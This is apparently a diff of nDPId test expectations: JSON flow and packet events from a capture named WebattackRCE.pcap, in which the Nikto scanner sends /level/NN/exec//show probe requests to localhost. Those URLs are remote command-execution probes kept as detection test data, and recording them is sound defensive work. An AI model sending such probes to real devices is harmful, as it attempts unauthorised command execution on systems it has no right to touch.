+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}}
